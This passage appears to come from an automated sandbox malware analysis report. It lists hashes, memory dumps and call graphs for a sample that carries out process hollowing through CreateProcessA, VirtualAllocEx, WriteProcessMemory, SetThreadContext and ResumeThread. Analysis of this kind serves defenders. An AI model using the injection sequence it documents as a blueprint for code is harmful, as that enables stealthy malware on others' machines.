                                                          • Opcode Fuzzy Hash: 589d0ece005340d295a4b4b144ce1396ca5e9bc0edac3690092c3612227cb7f2
                                                          • Instruction Fuzzy Hash: 78018135B105144BDBA8EA7CE565B2E73D6E789B94F10C438E60AC7348EE22EC018B85
                                                          Function 06546540 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99e40c5c066b2e58c197fbd85d182d1ec74d4f723377f746431b88503106758e
                                                          • Instruction ID: 8f26bcc451498620b6a73dbcc431a9cfd36e904e1d02c5994237dc4bf4b4d4ba
                                                          • Opcode Fuzzy Hash: 99e40c5c066b2e58c197fbd85d182d1ec74d4f723377f746431b88503106758e
                                                          • Instruction Fuzzy Hash: 26E09271E15248ABEB60DE74894979A7B69E742208F5044F5E808CB106E576CD018B92

                                                          Execution Graph

                                                          Execution Coverage:11.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:138
                                                          Total number of Limit Nodes:7
                                                          execution_graph 31230 7b87c48 31231 7b87c82 31230->31231 31232 7b87cfe 31231->31232 31233 7b87d13 31231->31233 31238 7b866b4 31232->31238 31235 7b866b4 3 API calls 31233->31235 31237 7b87d22 31235->31237 31239 7b866bf 31238->31239 31240 7b87d09 31239->31240 31243 7b88708 31239->31243 31249 7b886fa 31239->31249 31256 7b8670c 31243->31256 31245 7b8872f 31245->31240 31247 7b88758 CreateIconFromResourceEx 31248 7b887d6 31247->31248 31248->31240 31250 7b88708 31249->31250 31251 7b8670c CreateIconFromResourceEx 31250->31251 31252 7b88722 31251->31252 31253 7b8872f 31252->31253 31254 7b88758 CreateIconFromResourceEx 31252->31254 31253->31240 31255 7b887d6 31254->31255 31255->31240 31257 7b88758 CreateIconFromResourceEx 31256->31257 31258 7b88722 31257->31258 31258->31245 31258->31247 31198 bc9dd8 31199 bc9dfa 31198->31199 31202 bc9c3c 31199->31202 31201 bc9e51 31203 bc9c47 31202->31203 31206 bc9c4c 31203->31206 31205 bca4a2 31205->31201 31207 bc9c57 31206->31207 31210 bc9c6c 31207->31210 31209 bca7b5 31209->31205 31211 bc9c77 31210->31211 31214 bc9c9c 31211->31214 31213 bca89a 31213->31209 31215 bc9ca7 31214->31215 31218 bc9ccc 31215->31218 31217 bca99c 31217->31213 31219 bc9cd7 31218->31219 31222 bcd660 31219->31222 31221 bcd7d8 31221->31217 31223 bcd66b 31222->31223 31224 bcf25a 31223->31224 31226 bcf2b8 31223->31226 31224->31221 31227 bcf2fb 31226->31227 31228 bcf306 KiUserCallbackDispatcher 31227->31228 31229 bcf330 31227->31229 31228->31229 31229->31224 31074 8f5c870 31075 8f5c8b0 VirtualAllocEx 31074->31075 31077 8f5c8ed 31075->31077 31078 8f5f9b0 31079 8f5f9c5 31078->31079 31083 8f5c790 31079->31083 31087 8f5c798 31079->31087 31080 8f5f9db 31084 8f5c798 Wow64SetThreadContext 31083->31084 31086 8f5c825 31084->31086 31086->31080 31088 8f5c7dd Wow64SetThreadContext 31087->31088 31090 8f5c825 31088->31090 31090->31080 31191 8f5fa20 31192 8f5fbab 31191->31192 31193 8f5fa46 31191->31193 31193->31192 31195 8f5bfe8 31193->31195 31196 8f5fca0 PostMessageW 31195->31196 31197 8f5fd0c 31196->31197 31197->31193 31091 8f5d0bb 31096 8f5e806 31091->31096 31107 8f5e798 31091->31107 31117 8f5e7a8 31091->31117 31092 8f5cfd4 31097 8f5e794 31096->31097 31099 8f5e809 31096->31099 31127 8f5ee82 31097->31127 31133 8f5ef90 31097->31133 31137 8f5f070 31097->31137 31141 8f5ec87 31097->31141 31146 8f5edb5 31097->31146 31151 8f5f0a8 31097->31151 31155 8f5eeff 31097->31155 31099->31092 31108 8f5e7c2 31107->31108 31110 8f5edb5 2 API calls 31108->31110 31111 8f5ec87 2 API calls 31108->31111 31112 8f5f070 2 API calls 31108->31112 31113 8f5ef90 2 API calls 31108->31113 31114 8f5ee82 2 API calls 31108->31114 31115 8f5eeff 2 API calls 31108->31115 31116 8f5f0a8 2 API calls 31108->31116 31109 8f5e7e6 31109->31092 31110->31109 31111->31109 31112->31109 31113->31109 31114->31109 31115->31109 31116->31109 31118 8f5e7c2 31117->31118 31120 8f5edb5 2 API calls 31118->31120 31121 8f5ec87 2 API calls 31118->31121 31122 8f5f070 2 API calls 31118->31122 31123 8f5ef90 2 API calls 31118->31123 31124 8f5ee82 2 API calls 31118->31124 31125 8f5eeff 2 API calls 31118->31125 31126 8f5f0a8 2 API calls 31118->31126 31119 8f5e7e6 31119->31092 31120->31119 31121->31119 31122->31119 31123->31119 31124->31119 31125->31119 31126->31119 31128 8f5ee88 31127->31128 31129 8f5f65f 31128->31129 31159 8f5c930 31128->31159 31163 8f5c928 31128->31163 31130 8f5f1c8 31135 8f5c930 WriteProcessMemory 31133->31135 31136 8f5c928 WriteProcessMemory 31133->31136 31134 8f5efbe 31135->31134 31136->31134 31138 8f5f08b 31137->31138 31167 8f5c6e7 31138->31167 31171 8f5c6e8 31138->31171 31142 8f5ec8d 31141->31142 31175 8f5cbae 31142->31175 31179 8f5cbb8 31142->31179 31147 8f5f14d 31146->31147 31149 8f5c930 WriteProcessMemory 31147->31149 31150 8f5c928 WriteProcessMemory 31147->31150 31148 8f5e7e6 31148->31092 31149->31148 31150->31148 31152 8f5f0c2 31151->31152 31153 8f5c6e7 ResumeThread 31152->31153 31154 8f5c6e8 ResumeThread 31152->31154 31153->31152 31154->31152 31183 8f5ca20 31155->31183 31187 8f5ca1a 31155->31187 31156 8f5ee9c 31160 8f5c978 WriteProcessMemory 31159->31160 31162 8f5c9cf 31160->31162 31162->31130 31164 8f5c930 WriteProcessMemory 31163->31164 31166 8f5c9cf 31164->31166 31166->31130 31168 8f5c728 ResumeThread 31167->31168 31170 8f5c759 31168->31170 31170->31138 31172 8f5c728 ResumeThread 31171->31172 31174 8f5c759 31172->31174 31174->31138 31176 8f5cc41 CreateProcessA 31175->31176 31178 8f5ce03 31176->31178 31178->31178 31180 8f5cc41 CreateProcessA 31179->31180 31182 8f5ce03 31180->31182 31182->31182 31184 8f5ca6b ReadProcessMemory 31183->31184 31186 8f5caaf 31184->31186 31186->31156 31188 8f5ca20 ReadProcessMemory 31187->31188 31190 8f5caaf 31188->31190 31190->31156

                                                          Executed Functions

                                                          Function 08F5CBAE Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 113 8f5cbae-8f5cc4d 115 8f5cc86-8f5cca6 113->115 116 8f5cc4f-8f5cc59 113->116 121 8f5ccdf-8f5cd0e 115->121 122 8f5cca8-8f5ccb2 115->122 116->115 117 8f5cc5b-8f5cc5d 116->117 119 8f5cc80-8f5cc83 117->119 120 8f5cc5f-8f5cc69 117->120 119->115 123 8f5cc6d-8f5cc7c 120->123 124 8f5cc6b 120->124 132 8f5cd47-8f5ce01 CreateProcessA 121->132 133 8f5cd10-8f5cd1a 121->133 122->121 126 8f5ccb4-8f5ccb6 122->126 123->123 125 8f5cc7e 123->125 124->123 125->119 127 8f5ccd9-8f5ccdc 126->127 128 8f5ccb8-8f5ccc2 126->128 127->121 130 8f5ccc4 128->130 131 8f5ccc6-8f5ccd5 128->131 130->131 131->131 135 8f5ccd7 131->135 144 8f5ce03-8f5ce09 132->144 145 8f5ce0a-8f5ce90 132->145 133->132 134 8f5cd1c-8f5cd1e 133->134 136 8f5cd41-8f5cd44 134->136 137 8f5cd20-8f5cd2a 134->137 135->127 136->132 139 8f5cd2c 137->139 140 8f5cd2e-8f5cd3d 137->140 139->140 140->140 141 8f5cd3f 140->141 141->136 144->145 155 8f5cea0-8f5cea4 145->155 156 8f5ce92-8f5ce96 145->156 158 8f5ceb4-8f5ceb8 155->158 159 8f5cea6-8f5ceaa 155->159 156->155 157 8f5ce98 156->157 157->155 161 8f5cec8-8f5cecc 158->161 162 8f5ceba-8f5cebe 158->162 159->158 160 8f5ceac 159->160 160->158 164 8f5cede-8f5cee5 161->164 165 8f5cece-8f5ced4 161->165 162->161 163 8f5cec0 162->163 163->161 166 8f5cee7-8f5cef6 164->166 167 8f5cefc 164->167 165->164 166->167 169 8f5cefd 167->169 169->169
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F5CDEE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 84b194fc2d489331ca7d44e79eb79e0f50285aa6eb379b547cdf2eeb0039b370
                                                          • Instruction ID: e0fdaa375997763957be9f9e481b6d85b661af5f15f794dde41631418e321909
                                                          • Opcode Fuzzy Hash: 84b194fc2d489331ca7d44e79eb79e0f50285aa6eb379b547cdf2eeb0039b370
                                                          • Instruction Fuzzy Hash: 51A18C71D00759CFEB20CF68C8817EEBBB2BF48301F0485A9E959A7240DB749981CF91
                                                          Function 08F5CBB8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 170 8f5cbb8-8f5cc4d 172 8f5cc86-8f5cca6 170->172 173 8f5cc4f-8f5cc59 170->173 178 8f5ccdf-8f5cd0e 172->178 179 8f5cca8-8f5ccb2 172->179 173->172 174 8f5cc5b-8f5cc5d 173->174 176 8f5cc80-8f5cc83 174->176 177 8f5cc5f-8f5cc69 174->177 176->172 180 8f5cc6d-8f5cc7c 177->180 181 8f5cc6b 177->181 189 8f5cd47-8f5ce01 CreateProcessA 178->189 190 8f5cd10-8f5cd1a 178->190 179->178 183 8f5ccb4-8f5ccb6 179->183 180->180 182 8f5cc7e 180->182 181->180 182->176 184 8f5ccd9-8f5ccdc 183->184 185 8f5ccb8-8f5ccc2 183->185 184->178 187 8f5ccc4 185->187 188 8f5ccc6-8f5ccd5 185->188 187->188 188->188 192 8f5ccd7 188->192 201 8f5ce03-8f5ce09 189->201 202 8f5ce0a-8f5ce90 189->202 190->189 191 8f5cd1c-8f5cd1e 190->191 193 8f5cd41-8f5cd44 191->193 194 8f5cd20-8f5cd2a 191->194 192->184 193->189 196 8f5cd2c 194->196 197 8f5cd2e-8f5cd3d 194->197 196->197 197->197 198 8f5cd3f 197->198 198->193 201->202 212 8f5cea0-8f5cea4 202->212 213 8f5ce92-8f5ce96 202->213 215 8f5ceb4-8f5ceb8 212->215 216 8f5cea6-8f5ceaa 212->216 213->212 214 8f5ce98 213->214 214->212 218 8f5cec8-8f5cecc 215->218 219 8f5ceba-8f5cebe 215->219 216->215 217 8f5ceac 216->217 217->215 221 8f5cede-8f5cee5 218->221 222 8f5cece-8f5ced4 218->222 219->218 220 8f5cec0 219->220 220->218 223 8f5cee7-8f5cef6 221->223 224 8f5cefc 221->224 222->221 223->224 226 8f5cefd 224->226 226->226
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F5CDEE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: b9a7f9395a75c0c767d8cabfac1a044885f6277516cbacaf04a2b223074dc5ee
                                                          • Instruction ID: fbff1008cf12fb59a2b9eee7f01617e5ea430ad2b2e9d1529821011abb13f10c
                                                          • Opcode Fuzzy Hash: b9a7f9395a75c0c767d8cabfac1a044885f6277516cbacaf04a2b223074dc5ee
                                                          • Instruction Fuzzy Hash: D9917C71D00759CFEB20CF68C885BEEBBB2BF48311F148569E919A7240DB749A85CF91
                                                          Function 07B88708 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 7b88708-7b8872d call 7b8670c 230 7b8872f-7b8873f 227->230 231 7b88742-7b887d4 CreateIconFromResourceEx 227->231 235 7b887dd-7b887fa 231->235 236 7b887d6-7b887dc 231->236 236->235
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1495612436.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7b80000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: 232fce199e10e09779f5866d6f4afc65f6e1e29dc88f6eed5b59f4e29e9b0215
                                                          • Instruction ID: f39c4f2f21fbd2ec4cc3e44949c4ed944945247776351baa75cea007c8a17235
                                                          • Opcode Fuzzy Hash: 232fce199e10e09779f5866d6f4afc65f6e1e29dc88f6eed5b59f4e29e9b0215
                                                          • Instruction Fuzzy Hash: 59318BB6900349DFDB11DFA9C840ADEBFF8EF49310F18809AE958A7211C3359954CFA1
                                                          Function 08F5C928 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 239 8f5c928-8f5c97e 242 8f5c980-8f5c98c 239->242 243 8f5c98e-8f5c9cd WriteProcessMemory 239->243 242->243 245 8f5c9d6-8f5ca06 243->245 246 8f5c9cf-8f5c9d5 243->246 246->245
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F5C9C0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: fb78e5033cdb6607bbe1e317348e74aa79cf08ba6d91756c7cc7fa6721a3e27a
                                                          • Instruction ID: 4aae5b034fab0fe92cdcf8c6a46e742b3a6ba1b7e047f374b0821ec2d981e6d0
                                                          • Opcode Fuzzy Hash: fb78e5033cdb6607bbe1e317348e74aa79cf08ba6d91756c7cc7fa6721a3e27a
                                                          • Instruction Fuzzy Hash: BF2146B1900349DFDB10CFAAC885BDEBBF5FF48310F54882AE959A7240C7799940CBA1
                                                          Function 08F5C930 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 250 8f5c930-8f5c97e 252 8f5c980-8f5c98c 250->252 253 8f5c98e-8f5c9cd WriteProcessMemory 250->253 252->253 255 8f5c9d6-8f5ca06 253->255 256 8f5c9cf-8f5c9d5 253->256 256->255
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F5C9C0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: c73ed9d50e17015c775ffce65357ab5202799c5079e7e71082c3b63f1f1ad481
                                                          • Instruction ID: 24d7fc050dfb7182bed563d5929c82691174094398402ea2ce38a7d21bb5290b
                                                          • Opcode Fuzzy Hash: c73ed9d50e17015c775ffce65357ab5202799c5079e7e71082c3b63f1f1ad481
                                                          • Instruction Fuzzy Hash: 3C2124B1900349DFDB10CFAAC881BDEBBF5FF48310F14882AE959A7240D7799944CBA4
                                                          Function 08F5CA1A Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 271 8f5ca1a-8f5caad ReadProcessMemory 275 8f5cab6-8f5cae6 271->275 276 8f5caaf-8f5cab5 271->276 276->275
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F5CAA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 78594360a2fb2a9a2175a9629a377f5b75f7b5c330799992e2b30ac877dde7cb
                                                          • Instruction ID: 0eb70b53fd75dcf37623a008167462e0a16b1b15a3da0e56d1c6d99968e934aa
                                                          • Opcode Fuzzy Hash: 78594360a2fb2a9a2175a9629a377f5b75f7b5c330799992e2b30ac877dde7cb
                                                          • Instruction Fuzzy Hash: AE213671C003499FDB10CFAAC841BEEBBF5FF48310F54842AE959A7251D7399500CBA1
                                                          Function 08F5C790 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 260 8f5c790-8f5c7e3 263 8f5c7e5-8f5c7f1 260->263 264 8f5c7f3-8f5c823 Wow64SetThreadContext 260->264 263->264 266 8f5c825-8f5c82b 264->266 267 8f5c82c-8f5c85c 264->267 266->267
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F5C816
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 6fcd9a35ae7b59e6294836bd83029e277f9c89387df5bb80696c43c76ad44caa
                                                          • Instruction ID: a71c0e00e9add3bc548f694f23f988dd1e62900d57473a706d543a47c6b89b9a
                                                          • Opcode Fuzzy Hash: 6fcd9a35ae7b59e6294836bd83029e277f9c89387df5bb80696c43c76ad44caa
                                                          • Instruction Fuzzy Hash: C2215771D003489FDB10CFAAC8857EEBBF4EF49214F54842AD559A7341C7789945CFA1
                                                          Function 08F5CA20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 290 8f5ca20-8f5caad ReadProcessMemory 293 8f5cab6-8f5cae6 290->293 294 8f5caaf-8f5cab5 290->294 294->293
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F5CAA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 944218cdb520f10245fb79a41291508db4ddf955ff43de184957fb3564e9073a
                                                          • Instruction ID: 105cafa6493cca063e4f1880eb52abe650a6eec2302f4a5436b1fc5ae0fd921e
                                                          • Opcode Fuzzy Hash: 944218cdb520f10245fb79a41291508db4ddf955ff43de184957fb3564e9073a
                                                          • Instruction Fuzzy Hash: 392125B1C003499FDB10CFAAC881BEEBBF5FF48310F54842AE919A7240D7799940CBA5
                                                          Function 08F5C798 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 280 8f5c798-8f5c7e3 282 8f5c7e5-8f5c7f1 280->282 283 8f5c7f3-8f5c823 Wow64SetThreadContext 280->283 282->283 285 8f5c825-8f5c82b 283->285 286 8f5c82c-8f5c85c 283->286 285->286
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F5C816
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 3d02669d8929c5ec096165086bb63175133249cfe7882ea80e5a631ed51bc064
                                                          • Instruction ID: b66dca97a12ce86365b19e10d4c11f37de278e1fad6b6ce00a97d3f5cc4d6b99
                                                          • Opcode Fuzzy Hash: 3d02669d8929c5ec096165086bb63175133249cfe7882ea80e5a631ed51bc064
                                                          • Instruction Fuzzy Hash: B9214771D003098FDB10DFAAC4857EEBBF4EF48320F54842AD919A7240CB789945CFA1
                                                          Function 08F5C868 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 298 8f5c868-8f5c8b3 301 8f5c8ba-8f5c8eb VirtualAllocEx 298->301 302 8f5c8f4-8f5c919 301->302 303 8f5c8ed-8f5c8f3 301->303 303->302
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F5C8DE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 96b8b8ffd6136aeeaeb310162da5aef44cba8793ae6281ab9fa80366f39fc5f3
                                                          • Instruction ID: 89c8b22c8f47b8dceff4bcd5ded8337de99d09670926c886c0ef311cc7e45cba
                                                          • Opcode Fuzzy Hash: 96b8b8ffd6136aeeaeb310162da5aef44cba8793ae6281ab9fa80366f39fc5f3
                                                          • Instruction Fuzzy Hash: 502186728003489FDB10CFAAC844BDFBFF5EF89324F24881AE519A7210C73A9500DBA1
                                                          Function 07B8670C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 307 7b8670c-7b887d4 CreateIconFromResourceEx 309 7b887dd-7b887fa 307->309 310 7b887d6-7b887dc 307->310 310->309
                                                          APIs
                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07B88722,?,?,?,?,?), ref: 07B887C7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1495612436.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7b80000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: 2edc340d09ee6e5342198fc5f55542fd145309a7a1fe38ff61efc6fee0cfe526
                                                          • Instruction ID: a461be407010579adb129a2d0619b69f6e71cdf3c3034ddd76d29181729b81fa
                                                          • Opcode Fuzzy Hash: 2edc340d09ee6e5342198fc5f55542fd145309a7a1fe38ff61efc6fee0cfe526
                                                          • Instruction Fuzzy Hash: 041114B5800249DFDB10DFAAD844BDEBBF8EB48310F54845AE515A7210C375A954CFA5
                                                          Function 08F5C870 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 313 8f5c870-8f5c8eb VirtualAllocEx 316 8f5c8f4-8f5c919 313->316 317 8f5c8ed-8f5c8f3 313->317 317->316
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F5C8DE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: cbdcda304c371ad98620a9821ac18fdc7be9cab69b82a180322f0847149201f6
                                                          • Instruction ID: b853d05d707ae6a0ef756134b379cd8dc6d4ce49029768bc28c1dfc1ec463069
                                                          • Opcode Fuzzy Hash: cbdcda304c371ad98620a9821ac18fdc7be9cab69b82a180322f0847149201f6
                                                          • Instruction Fuzzy Hash: BF1126718003499FDB10DFAAD845BDEBBF5EF88310F24881AE519A7250C7799540DBA1
                                                          Function 00BCF2B8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00BCF31D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1483196500.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_bc0000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: b10e8fc0ab5078943c1a00fa819749cfc8926755f7c5d745eb7c52f187af6dbd
                                                          • Instruction ID: 7cc6d467d8911c9fefe680488b9d526091afebcde944d96dd32d364297387bf2
                                                          • Opcode Fuzzy Hash: b10e8fc0ab5078943c1a00fa819749cfc8926755f7c5d745eb7c52f187af6dbd
                                                          • Instruction Fuzzy Hash: BF11EFB1844388CFDB10CF96E0047EEBFF4EB04314F54849DD588A7242D3799A08CBA9
                                                          Function 08F5C6E7 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: edc3ab00ff7af3f1f73bfbb783fd739154a874442080e37ad969de35c4d3075e
                                                          • Instruction ID: de2c46905a110ac87cdcb8f5df1a5c6492e071431d013331840f17245b69b416
                                                          • Opcode Fuzzy Hash: edc3ab00ff7af3f1f73bfbb783fd739154a874442080e37ad969de35c4d3075e
                                                          • Instruction Fuzzy Hash: 97115871D003488FDB20DFAAD4457EEFBF4AB88210F248419D51AA7240C7755544CF94
                                                          Function 08F5C6E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 179f7c4101e0933176a27c5e2ce858a48d4fb404a5cae068e666641ffc699163
                                                          • Instruction ID: d1947ffef7fdf27f252e1a9f7a571d1e7a6ec1c920a6c7764d1c8c49a216bbc6
                                                          • Opcode Fuzzy Hash: 179f7c4101e0933176a27c5e2ce858a48d4fb404a5cae068e666641ffc699163
                                                          • Instruction Fuzzy Hash: B8113A71D003488FDB10DFAAD4457DEFBF4AB88614F248419D519A7240C775A544CBA5
                                                          Function 08F5BFE8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 08F5FCFD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1506570798.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_8f50000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
